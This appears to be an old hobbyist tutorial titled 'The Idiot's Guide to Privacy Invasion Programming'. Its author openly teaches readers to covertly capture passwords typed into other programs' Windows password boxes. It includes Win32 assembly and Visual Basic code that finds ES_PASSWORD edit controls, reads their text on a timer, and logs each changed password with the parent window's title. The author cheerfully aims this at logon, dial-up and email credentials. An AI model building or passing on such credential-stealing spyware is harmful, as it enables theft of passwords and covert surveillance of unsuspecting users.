The Idiot's Guide to Privacy Invasion Programming
( or The Poor Programmer's James Bond )

password window example image

Password Windows

    Password windows - I love them :) since any Windows programmer knows that we can easily grab the passwords - no complex programming needed.

    Well, it seems that the only person we have to blame for this is Gates, 'cos a password window is supposed to be SECURE. In other words, it has to be at least very hard to get the password typed in the window, but Gates's team of programmers only managed to hide those passwords in the form of asterisks... Although that already looks very intimidating to most users, remember, we are programmers: all those '******' can be retrieved, 'cos the M$ programmers didn't do their job well enough in terms of security.

    I actually saw a few tonnes of programs which can reveal the text behind those *****'s, i.e. you see the true text typed in the password box instead of the ******'s. Anyway, OCY went far beyond that point a long time ago, 'cos OCY is a little more "naughty" than most of you... (snigger). The example code for this essay is my EditSpy2.zip.

Why password windows? What about keyboard hooks?

    Ooooooh... good question. Answer to the first one: let me give you some examples of programs which use password windows: Windows's Log-On Demand (interested already?), the Dial-Up Networking dialogue, Netscape browser windows - you can get the passwords to e-mails, forums, porn sites... :) and a whole bunch of other software. Are these interesting enough?

    Answer to the second question: Yes, keyboard hooks work as well, but they are worse in terms of memory and resource usage. Keyboard hooks are also much harder to code, and they generate too much data; to filter out that unwanted data we need to do a lot of extra coding... ( of course, good OCY will teach you how, but later... )

How to Detect a Password Window

    Firstly, OCY tells you WHAT a password window is. Generally, a password window is an Edit control with the ES_PASSWORD style. Is it that simple? NO!!!!!! Alas, high level compilers like VB generate weird edit controls with weirdo, 'pontianak', strange classnames, such as "ThunderRT6TextBox" (VB6), instead of the immortal beloved "EDIT"... And this is another sin committed by 'high-level' compilers: why generate different controls which operate just like the usual controls ( and screw up the system to be tangled in deep, deep holes of DLL's )? All that additional work involves so much window subclassing, superclassing... and nobody sees the difference between a "ThunderRT6TextBox" and a plain and simple "EDIT" control.

    Anyway, to recognize a password window, we just need to grab a window hWnd and check for the ES_PASSWORD style; that is already accurate enough. ( Checking for those "ThunderRT6TextBox" or any other compiler generated controls is not needed most of the time... ) See, good OCY knows the simplest way most of the time... :)

    To detect any kind of window, we need to enumerate all windows which exist; in programmers' words, we are going to call EnumWindows, and in the EnumWindowsProc we call EnumChildWindows. ( Edit controls can only be child windows, don't you know that? ) Well, in the EnumChildProc, we make sure that the current child window is a password window - our beloved target... and here is the code ( in Win32 asm, somebody please translate to C++ / VB / whatever? )

EnumChildProc  PROC hWnd:HWND,hOurWnd:HWND

.data
 PasswordFound db 50 dup(0)
               db 0
.code
 pushad
 pushf
 Invoke IsPasswordWindow,hWnd    ;check if it is a pwd window...

 .if eax == TRUE  ;if we found a password edit box...
   ;get the text of the password box
   Invoke  SendMessage,hWnd,WM_GETTEXT,50,addr PasswordFound

   ;do the recording here...

 .endif

continue_enum:
 popf
 popad
 mov eax,TRUE
 ret

EnumChildProc  ENDP

    Do you see the "IsPasswordWindow" call? It is not an API call but my own procedure; its job is to determine whether the given hWnd is a password window... and here it is... ( note that I include checking for VB6 text boxes as well as our regular Edit control )

; Function to determine whether a window (handle given) is an password edit box
; ClassName == "Edit" or "ThunderRT6TextBox"
IsPasswordWindow  PROC  hWnd:HWND
.data
 EditClass1  db "Edit",0
 EditClass2  db "ThunderRT6TextBox",0  ;Vb6 text box
 WinClassName db 50 dup(0)
              db 0
.code

 ;determine whether the windows is an edit box
 Invoke GetClassName,hWnd,addr WinClassName,50
 ;class name == "Edit"?
 Invoke lstrcmp,addr EditClass1,addr WinClassName

 .if eax == 0
  jmp check_password_style
 .endif

 ;class name == "ThunderRT6TextBox" ? (VB6 edit box)
 Invoke lstrcmp,addr EditClass2,addr WinClassName

 .if eax == 0
check_password_style:
  Invoke GetWindowLong,hWnd,GWL_STYLE
  test eax,ES_PASSWORD  ;check for the ES_PASSWORD char

  .if !zero?    ;if zero flag NOT set, it has a ES_PASSWORD style
    mov eax,TRUE  ;return true if it is password box
    ret
  .else
    mov eax,FALSE ;return false if it is not password box
    ret
  .endif
 .endif

 mov eax,FALSE  ;it is not password box, so return FALSE
 ret
IsPasswordWindow  ENDP

    Well, you see the GetWindowLong / test eax,ES_PASSWORD lines? That is the CORE of password window detection! Those lines translated to Visual Basic look something like this:

' Test the style bit with And (Or would always be non-zero)
If (GetWindowLong(hWnd, GWL_STYLE) And ES_PASSWORD) <> 0 Then
    IsPasswordWindow = True
Else
    IsPasswordWindow = False
End If

    Hey, this is sooooooooo simple, huh? ( Sorry for those who never speak in assembly language - I can't help you 'cos OCY doesn't speak C++ either :-P ) Anyway, I still haven't told you the MOST important thing: yep, you are right - recording the password typed. The EnumChildProc is actually triggered by a timer every 500 milliseconds ( should be fast enough to capture the passwords, huh? ), and the user is typing a password for a few seconds... So every half a second, EnumChildProc will grab a different (partial) password. The question is: how can we know WHICH one is the right one??? Anyway, OCY always has his way to get around things... Leap on to ............ recording the passwords!

Recording The Passwords

    Yeah, this is the crucial part... Before OCY preaches to you on how to record ONLY the correct password, let's declare that privacy under Winbloze is officially dead... But 'maipontelek'! Winbloze is still ruling the market! Let's hope that M$ can come out with better operating systems ( in terms of security ); then, if they still dominate the market, at least OCY has nothing else to say... I wonder, why can such a poor quality OS cling to the market so strongly?

    Well, forget about the OS debate... Anyway, Gates is such a kind man - he gave us such a lousy OS so that ( 'naughty' ) programmers like OCY can do what they want easily... To record the passwords typed, OCY actually came out with this solution ( not perfect, though ):

    Since the EnumChildProc is triggered every 500 milliseconds, we MUST NOT record the grabbed password every time... ( that will blast off your hard disk in a few hours! ) Well, assuming that there is ONLY 1 password window at that time, we save a copy of the previously grabbed password. After the next 500 milliseconds, EnumChildProc is called again, and we compare the CURRENT password with the PREVIOUS password... If the two are NOT equal, we record only the CURRENT password.

    What?!?!?! You don't understand??? Never mind, I expected that, let me give you a clear example: imagine that we have the Dial-Up Networking dialogue ( like the one on top of this page ) activated, and there is only 1 password window which exists on the system right now... After 500 ms, EnumChildProc is triggered, and it grabs a password, say "ocy password". It is stored in the CurrentPwd string variable. Then, CurrentPwd is compared to PreviousPwd...

1. PreviousPwd = ""
   CurrentPwd = "ocy password"

   Result: CurrentPwd != PreviousPwd, record CurrentPwd

   PreviousPwd = CurrentPwd

    Now, after another 500ms, EnumChildProc is called again... This time, OCY typed a few more keys into the password window, so EnumChildProc grabbed "ocy password is 123" ...

2. PreviousPwd = "ocy password"
   CurrentPwd = "ocy password is 123"

   Result: CurrentPwd != PreviousPwd, record CurrentPwd

   PreviousPwd = CurrentPwd

    Well, after another 500 ms (again!), EnumChildProc jumps into action again; this time, OCY does not type anything new, 'cos he has finished typing his password, and he is ready to click the "Connect" button on the Dial-Up Networking dialogue... So, the current password is still "ocy password is 123".

3. PreviousPwd = "ocy password is 123"
   CurrentPwd = "ocy password is 123"

   Result: CurrentPwd = PreviousPwd, do nothing

    Well, that is still very simple, huh? Of course, good OCY is not very good all the time - 'cos he decides to leave some work for you to do yourself! A new question arises: What if we have MORE than 1 password window at the same time??? Fine... That is what I want you to sort out yourself; anyway, it is easy. And another note of caution: I prefer clearing ALL the log file's contents first before making a new recording, so that the log file's size isn't too monstrous. Well, if you don't do that you get the following file:

ocy password <- First recording
ocy password is 123 <- Second recording
ocy password is 12345 <- 3rd recording and so on...
.
.
.

    Well, if you clear the contents every time before you write anything to the log file, you get this:

ocy password is 12345

and that is much clearer than the first one, 'cos in the first one we have to figure out ourselves which is the correct password ( "ocy password" or "ocy password is 123" ? ). Besides, you always get a bigger file with the first one.

    Urmmmmmph... Maybe OCY has nothing else left to talk about password windows, 'cos this is only the "Beginner" level of privacy invasion programming! I decided NOT to release OCY's own beloved tool of the trade - instead I will only let you have my EditSpy2.zip source for reference only ( EditSpy2 doesn't incorporate recording to log files ). Anyway, I have already given you the most important element of password windows - the right knowledge. As I said, I encourage creativity; what I present is reference material only, and who knows, maybe you can come up with a better way to detect password windows, or another way to record ONLY the correct password... etc.? Anyway, OCY knows that some programmers, like OCY himself, are lazy, so the only way to make them learn is to give them 'crippled' example codes, so that they can build their own programs. Hey, you are a programmer, why should you use my code 100% when you already have the ability to code?

Other Ideas

    Hey, even somebody like OCY who never grew up in a creative environment has to give you ideas? Never mind, OCY is very creative; his ideas are somewhat useful :-). Well, as you can see, if we only see "ocy password is 12345" and do not know what the password is for, what the hell are we going to do with the password?

    Hence, OCY suggests that you should record the password window's parent window's text, using the example window on this page, we should record something like:

-< Connect To >-
Password recorded: ocy password is 12345

    Now, the log file looks more readable. Who wants a log file with tonnes of information but totally incomprehensible, right? And recording the username ( and anything in other edit boxes ) is always useful...

    Second idea... Urmmmmph, think of one yourself... :)

- by the unorthodox OCY